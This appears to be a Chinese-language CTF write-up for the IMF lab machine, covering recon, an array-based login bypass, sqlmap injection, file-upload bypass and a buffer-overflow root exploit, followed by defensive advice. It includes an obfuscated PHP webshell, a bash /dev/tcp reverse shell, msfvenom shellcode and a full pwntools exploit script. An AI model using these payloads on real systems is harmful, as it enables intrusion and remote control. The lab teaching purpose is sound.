IMF File Upload Bypass & Buffer Overflow 漏洞利用教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标识别<\/h3>

IP地址<\/strong>: 192.168.8.103<\/li>

开放端口<\/strong>: TCP 80 (HTTP)<\/li> <\/ul>
1.2 Nmap扫描<\/h3>
nmap -p- 192.168.8.103 --min-rate 1000<\/span> -sC -sV <\/span><\/span><\/code><\/pre>扫描结果<\/strong>:<\/p> 80\/tcp open http Apache httpd 2.4.18 (Ubuntu)<\/li> 网站标题: IMF - Homepage<\/li> <\/ul> 2. Flag获取过程<\/h2> 2.1 Flag 1<\/h3> 位置<\/strong>: http:\/\/192.168.8.103\/contact.php 内容<\/strong>: flag1{YWxsdGhlZmlsZXM=}<\/code> 解码<\/strong>: allthefiles<\/code> (Base64解码)<\/p> 2.2 Flag 2<\/h3> 通过拼接文件名发现: Base64编码<\/strong>: ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==<\/code> 解码<\/strong>: flag2{aW1mYWRtaW5pc3RyYXRvcg==}<\/code> 二次解码<\/strong>: imfadministrator<\/code><\/p> 2.3 Flag 3<\/h3> 登录页面<\/strong>: http:\/\/192.168.8.103\/imfadministrator\/ 登录凭证<\/strong>:<\/p> 用户名: rmichaels<\/code><\/li> 密码: pass[]=123<\/code> (使用数组绕过验证)<\/li> <\/ul> Flag内容<\/strong>: flag3{Y29udGludWVUT2Ntcw==}<\/code> 解码<\/strong>: continueTOcms<\/code><\/p> 2.4 Flag 4<\/h3> 使用SQLMap进行SQL注入:<\/p> sqlmap -u "http:\/\/192.168.8.103\/imfadministrator\/cms.php?pagename=home"<\/span> \ <\/span><\/span><\/span><\/span>--cookie "PHPSESSID=mtcagv7kevus11r651k0ekor65"<\/span> \ <\/span><\/span><\/span><\/span>-D admin -T pages --dump-all --batch <\/span><\/span><\/code><\/pre>发现文件<\/strong>: uploadr942.php<\/code> (Base64解码dXBsb2Fkcjk0Mi5waHA=<\/code>)<\/p> 2.5 Flag 5<\/h3> 上传绕过技术1<\/strong>:<\/p> 在请求体中添加GIF8;<\/code>伪造文件头<\/li> 使用十六进制编码绕过WAF过滤system<\/code>关键字<\/li> <\/ul> GIF8<\/span>;<?<\/span>php<\/span>"<\/span>\x73\7<\/span>9<\/span>\x73\x74\x65\x6d<\/span>"<\/span>($_GET['cmd'<\/span>]);?><\/span> <\/span><\/span><\/span><\/code><\/pre>上传绕过技术2<\/strong>:<\/p> echo 'FFD8FFEo'<\/span> | xxd -r -p > test.gif <\/span><\/span>echo '<?php echo `id`'<\/span> >> test.gif <\/span><\/span>echo 'GIF8;<?php echo `\/bin\/bash -c '<\/span>bash -i >& \/dev\/tcp\/192.168.8.107\/10032 0>&1'`;?>'<\/span> >> test.gif <\/span><\/span><\/code><\/pre>获取Flag5<\/strong>: flag5{YWdlbnRzZXJ2aWNlcw==}<\/code> 解码<\/strong>: agentservices<\/code><\/p> 3. 缓冲区溢出利用<\/h2> 3.1 环境设置<\/h3> 使用Chisel建立反向隧道:<\/p> # Kali (攻击机)<\/span> <\/span><\/span>.\/chisel server -p 8888<\/span> --reverse <\/span><\/span> <\/span><\/span># 目标机<\/span> <\/span><\/span>.\/chisel client 192.168.8.107:8888 R:7788:localhost:7788 & <\/span><\/span><\/code><\/pre>3.2 漏洞分析<\/h3> 发现agent<\/code>程序在输入特定ID(0x2ddd984<\/code>或48093572)后会以root权限运行<\/li> report<\/code>函数中的gets<\/code>函数存在缓冲区溢出漏洞<\/li> <\/ul> 3.3 安全机制检查<\/h3> 使用GDB Peda检查二进制文件安全机制:<\/p> gdb -q .\/agents <\/span><\/span>checksec <\/span><\/span><\/code><\/pre>结果<\/strong>:<\/p> CANARY: disabled<\/li> FORTIFY: disabled<\/li> NX: disabled<\/li> PIE: disabled<\/li> RELRO: Partial<\/li> <\/ul> 3.4 漏洞利用步骤<\/h3> 确定偏移量<\/strong>:<\/li> <\/ol> pattern_create 2000<\/span> <\/span><\/span>pattern_offset 0x74414156 <\/span><\/span><\/code><\/pre>发现偏移量为168字节<\/p> 生成Shellcode<\/strong>:<\/li> <\/ol> msfvenom -p linux\/x86\/shell_reverse_tcp LHOST=<\/span>192.168.8.107 LPORT=<\/span>10034<\/span> \ <\/span><\/span><\/span><\/span>-f python -b "\x00\x0a\x0d"<\/span> <\/span><\/span><\/code><\/pre> 查找ROP gadget<\/strong>: 发现call eax<\/code>指令地址: 0x08048563<\/code><\/li> <\/ol> 3.5 利用脚本<\/h3> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span># 设置参数<\/span> <\/span><\/span>ip =<\/span> "127.0.0.1"<\/span> <\/span><\/span>port =<\/span> 7788<\/span> <\/span><\/span>local_port =<\/span> 10034<\/span> <\/span><\/span> <\/span><\/span># 建立连接<\/span> <\/span><\/span>client =<\/span> remote(ip, port) <\/span><\/span>initial_response =<\/span> client.<\/span>recv(512<\/span>).<\/span>decode() <\/span><\/span> <\/span><\/span># 发送特殊ID<\/span> <\/span><\/span>client.<\/span>sendline(b<\/span>"48093572"<\/span>) <\/span><\/span>response1 =<\/span> client.<\/span>recv(512<\/span>).<\/span>decode() <\/span><\/span>client.<\/span>sendline(b<\/span>"3"<\/span>) <\/span><\/span> <\/span><\/span># 构造payload<\/span> <\/span><\/span>shellcode =<\/span> ( <\/span><\/span> b<\/span>"<\/span>\xbe\xd7\x72\xc5\xb1\xd9\xeb\xd9\x74\x24\xf4\x58\x2b<\/span>"<\/span> <\/span><\/span> b<\/span>"<\/span>\xc9\xb1\x12\x31\x70\x12\x03\x70\x12\x83\x17\x76\x27<\/span>"<\/span> <\/span><\/span> b<\/span>"<\/span>\x44\xa6\xac\x50\x44\x9b\x11\xcc\xe1\x19\x1f\x13\x45<\/span>"<\/span> <\/span><\/span> b<\/span>"<\/span>\x7b\xd2\x54\x35\xda\x5c\x6b\xf7\x5c\xd5\xed\xfe\x34<\/span>"<\/span> <\/span><\/span> b<\/span>"<\/span>\x26\xa5\x09\xaf\xce\xb4\x09\x08\x3d\x30\xe8\xe6\x27<\/span>"<\/span> <\/span><\/span> b<\/span>"<\/span>\x12\xba\x55\x1b\x91\xb5\xb8\x96\x16\x97\x52\x47\x38<\/span>"<\/span> <\/span><\/span> b<\/span>"<\/span>\x6b\xca\xff\x69\xa4\x68\x69\xff\x59\x3e\x3a\x76\x7c<\/span>"<\/span> <\/span><\/span> b<\/span>"<\/span>\x0e\xb7\x45\xff<\/span>"<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span>padding =<\/span> b<\/span>"A"<\/span> *<\/span> (168<\/span> -<\/span> len(shellcode)) <\/span><\/span>call_eax_gadget =<\/span> b<\/span>"<\/span>\x63\x85\x04\x08\n<\/span>"<\/span> <\/span><\/span>payload =<\/span> shellcode +<\/span> padding +<\/span> call_eax_gadget <\/span><\/span> <\/span><\/span># 设置监听并发送payload<\/span> <\/span><\/span>listener =<\/span> listen(local_port) <\/span><\/span>client.<\/span>send(payload) <\/span><\/span>listener.<\/span>wait_for_connection() <\/span><\/span>listener.<\/span>interactive() <\/span><\/span><\/code><\/pre>4. 关键知识点总结<\/h2> 文件上传绕过技术<\/strong>:<\/p> 伪造文件头(GIF8)<\/li> 十六进制编码绕过关键字过滤<\/li> 使用数组绕过身份验证<\/li> <\/ul> <\/li> SQL注入<\/strong>:<\/p> 使用SQLMap自动化工具<\/li> 需要维持会话cookie<\/li> <\/ul> <\/li> 缓冲区溢出利用<\/strong>:<\/p> 确定偏移量<\/li> 检查安全机制<\/li> 生成无坏字符的shellcode<\/li> 利用ROP gadget跳转执行<\/li> <\/ul> <\/li> 权限提升<\/strong>:<\/p> 利用root权限运行的服务<\/li> 建立反向shell连接<\/li> <\/ul> <\/li> 网络隧道<\/strong>:<\/p> 使用Chisel建立反向隧道<\/li> 端口转发技术<\/li> <\/ul> <\/li> <\/ol> 5. 防御建议<\/h2> 文件上传<\/strong>:<\/p> 严格验证文件类型和内容<\/li> 使用白名单而非黑名单<\/li> 在服务器端进行验证<\/li> <\/ul> <\/li> SQL注入<\/strong>:<\/p> 使用预处理语句<\/li> 最小权限原则<\/li> <\/ul> <\/li> 缓冲区溢出<\/strong>:<\/p> 启用所有安全机制(CANARY, NX, PIE等)<\/li> 使用安全的字符串处理函数<\/li> 进行边界检查<\/li> <\/ul> <\/li> 权限控制<\/strong>:<\/p> 避免以root权限运行应用程序<\/li> 使用最小特权原则<\/li> <\/ul> <\/li> 输入验证<\/strong>:<\/p> 对所有用户输入进行严格验证<\/li> 使用安全的API处理用户输入<\/li> <\/ul> <\/li> <\/ol>